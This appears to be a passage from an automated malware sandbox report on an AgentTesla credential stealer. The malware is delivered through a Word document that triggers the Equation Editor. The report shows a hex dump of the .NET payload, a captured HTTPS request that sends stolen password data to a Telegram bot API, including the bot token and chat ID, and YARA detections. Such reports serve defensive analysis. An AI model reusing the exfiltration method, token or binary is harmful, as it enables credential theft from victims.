4d 65 64 76 65 64 65 76 00 00 00 32 7e 27 00 00 04 02 28 c0 00 00 06 2a 1e 02 28 a0 00 00 0a 2a 32 7e 35 00 00 04 02 28 0d 01 00 06 2a 1e 02 7b a0 00 00 04 2a 22 02 03 7d a0 00 00 04 2a 1e 02 7b a1 00 00 04 2a 22 02 03 7d a1 00 00 04 2a 1e 02 7b a2 00 00 04 2a 22 02 03 7d a2 00 00 04 2a 52 7e 3b 00 00 04 03 28 08 01 00 06 02 7b a3 00 00 04 fe 01 2a 1e 02 7b a4 00 00 04 2a 22 02 03 7d a4 00 00 04 2a 1e 02 7b a5 00 00 04 2a 22 02 03 7d a5 00 00 04 2a 1e 02 7b a6 00 00 04 2a 22 02 03 7d a6 00 00 04 2a 9a 7e 3e 00 00 04 7e 3c 00 00 04 02 28 0d 01 00 06 72 f3 45 00 70 7e 3d 00 00 04 02 28 0d 01 00 06 28 13 01 00 06 2a 1e 02 7b a7 00 00 04 2a 22 02 03 7d a7 00 00 04 2a 1e 02 7b a8 00 00 04 2a 22 02 03 7d a8 00 00 04 2a 4e 02 28 a0 00 00 0a 7e 3f 00 00 04 02 03 28 00 01 00 06 2a 1e 02 7b a9 00 00 04 2a 22 02 03 7d a9 00 00 04 2a ea 7e 3e 00 00 04 7e 40 00 00 04 02 28 0d 01 00 06 72 f7 45 00 70 7e 42 00 00 04 72 09 46 00 70 7e 41 00 00 04 02 28 16 01 00 06 8c 64 00 00 01 28 19 01 00 06 28 13 01 00 06 2a 3e 02 04 28 4f 00 00 06 02 03 7d aa 00 00 04 2a 3e 02 7b aa 00 00 04 02 7b aa 00 00 04 5a 6c 2a 3e 02 04 28 4f 00 00 06 02 03 7d ab 00 00 04 2a 66 02 7b ab 00 00 04 02 7b ab 00 00 04 5a 6c 23 18 2d 44 54 fb 21 09 40 5a 2a 5a 02 05 28 4f 00 00 06 02 03 7d ac 00 00 04 02 04 7d ad 00 00 04 2a 3e 02 7b ac 00 00 04 02 7b ad 00 00 04 5a 6c 2a 32 7e 98 00 00
                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELgaV>t @ @sS H.textDT V `.rsrcX@@.relocl@B tHX\EbIvan Medvedev2~'(*(*2~5(*{*"}*{*"}*{*"}*R~;({*{*"}*{*"}*{*"}*~>~<(rEp~=((*{*"}*{*"}*N(~?(*{*"}*~>~@(rEp~BrFp~A(d((*>(O}*>{{Zl*>(O}*f{{Zl#-DT!@Z*Z(O}}*>{{Zl*2~


                                                                                HTTPS Proxied Packets

                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                0192.168.2.2249169149.154.167.220443C:\Users\user\AppData\Roaming\gudostrp.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                2021-10-14 08:24:56 UTC0OUTPOST /bot2034238293:AAHoBUVeqtv7yJIYVLFYq5RA0AnxpaTX22s/sendDocument HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=---------------------------8d98f225cfe8da2
                                                                                Host: api.telegram.org
                                                                                Content-Length: 1018
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                2021-10-14 08:24:56 UTC0INHTTP/1.1 100 Continue
                                                                                2021-10-14 08:24:56 UTC0OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 66 32 32 35 63 66 65 38 64 61 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 36 36 37 30 36 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 66 32 32 35 63 66 65 38 64 61 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 55 73 65 72 20 4e 61 6d 65 3a 20 41 6c 62 75 73 2f 35 37 39 35 36 39 0a 4f 53 46 75 6c 6c
                                                                                Data Ascii: -----------------------------8d98f225cfe8da2Content-Disposition: form-data; name="chat_id"1366706404-----------------------------8d98f225cfe8da2Content-Disposition: form-data; name="caption"New PW Recovered!User Name: user/579569OSFull
                                                                                2021-10-14 08:24:56 UTC1INHTTP/1.1 200 OK
                                                                                Server: nginx/1.18.0
                                                                                Date: Thu, 14 Oct 2021 08:24:56 GMT
                                                                                Content-Type: application/json
                                                                                Content-Length: 656
                                                                                Connection: close
                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                Access-Control-Allow-Origin: *
                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                {"ok":true,"result":{"message_id":3749,"from":{"id":2034238293,"is_bot":true,"first_name":"takership","username":"takership_bot"},"chat":{"id":1366706404,"first_name":"\u627f\u529e\u4eba","last_name":"taker","username":"dtaker","type":"private"},"date":1634199896,"document":{"file_name":"user-579569 2021-10-14 02-52-20.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAIOpWFn6Vjq-3ycowABiEmEbyiu600j-gACwwgAAnGTQVMHP73qYkATfSEE","file_unique_id":"AgADwwgAAnGTQVM","file_size":439},"caption":"New PW Recovered!\n\nUser Name: user/579569\nOSFullName: Microsoft Windows 7 Professional \nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}


                                                                                Code Manipulations

                                                                                Statistics

                                                                                Behavior

                                                                                Click to jump to process

                                                                                System Behavior

                                                                                Analysis Process: WINWORD.EXE PID: 236 Parent PID: 596

                                                                                General

                                                                                Start time:10:22:14
                                                                                Start date:14/10/2021
                                                                                Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                Wow64 process (32bit):false
                                                                                Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                                                                Imagebase:0x13fbe0000
                                                                                File size:1423704 bytes
                                                                                MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:moderate

                                                                                Analysis Process: EQNEDT32.EXE PID: 512 Parent PID: 596

                                                                                General

                                                                                Start time:10:22:15
                                                                                Start date:14/10/2021
                                                                                Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                Wow64 process (32bit):true
                                                                                Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                                Imagebase:0x400000
                                                                                File size:543304 bytes
                                                                                MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high

                                                                                Analysis Process: gudostrp.exe PID: 1212 Parent PID: 512

                                                                                General

                                                                                Start time:10:22:17
                                                                                Start date:14/10/2021
                                                                                Path:C:\Users\user\AppData\Roaming\gudostrp.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:C:\Users\user\AppData\Roaming\gudostrp.exe
                                                                                Imagebase:0x1d0000
                                                                                File size:486912 bytes
                                                                                MD5 hash:BC5F0AA0262021DB5921D726F7A5B820
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:.Net C# or VB.NET
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.464298353.00000000031C9000.00000004.00000001.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000004.00000002.464298353.00000000031C9000.00000004.00000001.sdmp, Author: Joe Security
                                                                                Antivirus matches:
                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                Reputation:low

                                                                                Analysis Process: gudostrp.exe PID: 2576 Parent PID: 1212

                                                                                General

                                                                                Start time:10:22:42
                                                                                Start date:14/10/2021
                                                                                Path:C:\Users\user\AppData\Roaming\gudostrp.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:C:\Users\user\AppData\Roaming\gudostrp.exe
                                                                                Imagebase:0x1d0000
                                                                                File size:486912 bytes
                                                                                MD5 hash:BC5F0AA0262021DB5921D726F7A5B820
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:.Net C# or VB.NET
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.722361543.000000000238D000.00000004.00000001.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.722327903.0000000002338000.00000004.00000001.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.721925198.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000005.00000002.721925198.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.722261474.00000000022B1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000002.722261474.00000000022B1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.722261474.00000000022B1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                Reputation:low

                                                                                Disassembly

                                                                                Code Analysis

                                                                                Reset < >